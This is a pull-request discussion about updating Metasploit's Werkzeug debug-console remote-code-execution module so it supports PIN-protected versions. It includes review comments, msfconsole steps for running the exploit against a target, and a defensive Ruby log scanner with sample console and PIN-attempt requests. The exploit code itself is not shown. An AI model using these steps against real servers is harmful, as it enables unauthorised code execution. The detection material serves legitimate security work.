Update werkzeug rce module #19533
Conversation
Impressive documentation!
'Description' => 'This module will exploit the Werkzeug debug console to put down a Python shell. Werkzeug ' \ | ||
'is included with Flask, but not enabled by default. It is also included in other ' \ | ||
'projects, for example the RunServerPlus extension for Django. It may also be used ' \ | ||
"alone.\n\n" \ | ||
'The documentation states the following: "The debugger must never be used on production ' \ | ||
'machines. We cannot stress this enough. Do not enable the debugger in production." Of ' \ | ||
"course this doesn't prevent developers from mistakenly enabling it in production!\n\n" \ | ||
"Tested against the following Werkzeug versions:\n" \ | ||
"- 3.0.3 on Debian 12, Windows 11 and macOS 14.6\n" \ | ||
"- 1.1.4 on Debian 12\n" \ | ||
"- 1.0.1 on Debian 12\n" \ | ||
"- 0.11.5 on Debian 12\n" \ | ||
'- 0.10 on Debian 12', |
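Review bot: the mix of single- and double-quoted fragments joined with `\` continuations and explicit `\n` escapes is fragile and hard to edit; since the line breaks are wanted in `info` output, a squiggly heredoc (`'Description' => <<~DESC ... DESC`) keeps them literally with no escapes or continuation backslashes, and is the layout the framework's own `Layout/ModuleDescriptionIndentation` cop expects for multi-line descriptions.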
No need for the `\n` and `\`
The new lines are required for formatting when the user runs the `info` command in msfconsole.
I'll update the documentation soon to include the logs that were previously verbose.
Done
This looks really nice. Thanks for sending it to us and taking the time to integrate the updates with the existing module.
'Arch' => ARCH_PYTHON, | ||
'DefaultTarget' => 0, | ||
'DisclosureDate' => '2015-06-28' | ||
'DisclosureDate' => 'Jun 28, 2015', |
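Review bot: the new line rewrites `DisclosureDate` from `'2015-06-28'` to `'Jun 28, 2015'`; keep the original ISO `YYYY-MM-DD` form, which is the one the rest of the framework's modules use. The replacement also gains a trailing comma where the removed line had none, so confirm that whatever entry now follows it still closes the info hash correctly.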
Reading this, we realized our documentation was old. Please leave the original date format.
Also, please run this module through Rubocop: https://docs.metasploit.com/docs/development/quality/using-rubocop.html#rubocop
Changed the date, but haven't run it through rubocop yet.
@bwatters-r7, is there a rubocop.yml with rules in that I should use?
I've run it through rubocop and it changed a bunch of things, but it also printed out an error:
An error occurred while Layout/ModuleDescriptionIndentation cop was inspecting /home/grobinson/metasploit-framework/modules/exploits/multi/http/werkzeug_debug_rce.rb:17:2
This updates an existing module that only targeted older versions of the vulnerable Werkzeug application that didn't include any authentication. The update adds support for newer versions of Werkzeug that do support authentication. The updated module supports the following authentication methods:
When generating a cookie (and PIN), there are three different algorithms used, depending on the target selected by the user. This is because the algorithm used to generate the cookie/PIN has changed throughout the application's development.
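From the defender's side, the same console interaction the module drives leaves a recognisable trace in a web server's access log. The following is an added example, not part of the PR or of Werkzeug: it scans constructed combined-format log lines for hits on Werkzeug's debugger console (`/console` and the `__debugger__=yes` query Werkzeug's debugger uses, including its `cmd=pinauth` PIN check) and counts PIN attempts per source address; the `pin_threshold` value is an assumed tuning knob.

```ruby
require 'uri'
require 'cgi'

# Constructed sample access-log lines (combined log format); not real traffic.
SAMPLE_LOG = <<~LOG
  10.0.0.5 - - [01/Aug/2024:10:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"
  10.0.0.9 - - [01/Aug/2024:10:00:02 +0000] "GET /console HTTP/1.1" 200 2048 "-" "curl/8.0"
  10.0.0.9 - - [01/Aug/2024:10:00:03 +0000] "GET /console?__debugger__=yes&cmd=pinauth&pin=000-000-000&s=abc HTTP/1.1" 200 64 "-" "curl/8.0"
  10.0.0.9 - - [01/Aug/2024:10:00:04 +0000] "GET /console?__debugger__=yes&cmd=pinauth&pin=111-111-111&s=abc HTTP/1.1" 200 64 "-" "curl/8.0"
  10.0.0.9 - - [01/Aug/2024:10:00:05 +0000] "GET /console?__debugger__=yes&cmd=print(1)&frm=0&s=abc HTTP/1.1" 200 64 "-" "curl/8.0"
  10.0.0.7 - - [01/Aug/2024:10:00:06 +0000] "POST /api/items HTTP/1.1" 201 30 "-" "python-requests/2.31"
LOG

# Minimal combined-log parser: client IP, timestamp, method, request target, status.
LOG_RE = /\A(?<ip>\S+) \S+ \S+ \[(?<ts>[^\]]+)\] "(?<method>\S+) (?<target>\S+) [^"]*" (?<status>\d{3})/

# Classify one log line. Returns nil for benign lines, otherwise a hash saying
# whether it was the console page, a PIN attempt, or a command sent to the console.
def classify(line)
  m = LOG_RE.match(line)
  return nil unless m
  uri = begin
    URI.parse(m[:target])
  rescue URI::InvalidURIError
    return nil # malformed target: nothing we can reason about here
  end
  params = uri.query ? CGI.parse(uri.query) : {}
  debugger = params.key?('__debugger__')
  return nil unless debugger || uri.path == '/console'
  cmd = params.fetch('cmd', []).first
  kind = if !debugger then :console_page
         elsif cmd == 'pinauth' then :pin_attempt
         else :console_cmd
         end
  { ip: m[:ip], ts: m[:ts], path: uri.path, cmd: cmd, kind: kind }
end

# Scan a whole log: list every console hit and flag IPs whose PIN attempts
# reach pin_threshold (an assumed value; tune it to your environment).
def scan(log, pin_threshold: 2)
  hits = log.each_line.map { |l| classify(l.strip) }.compact
  attempts = Hash.new(0)
  hits.each { |h| attempts[h[:ip]] += 1 if h[:kind] == :pin_attempt }
  brute = attempts.select { |_, n| n >= pin_threshold }.keys
  { hits: hits, pin_attempts: attempts, brute_force_ips: brute }
end
```

Any hit at all on `/console` in production is worth an alert, since the debugger should never be enabled there; the per-IP PIN counter only adds a stronger signal on top of that.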
Verification
msfconsole
use exploit/multi/http/werkzeug_debug_rce
set RHOSTS <ip>
set LHOST <ip>
set VHOST 127.0.0.1
set MACADDRESS <mac-address>
set MACHINEID <machine-id>
set FLASKPATH /usr/local/lib/python3.12/site-packages/flask/app.py
run
Sample vulnerable app code is included in the documentation, as well as additional verification steps, covering multiple versions of Werkzeug, and multiple exploit paths.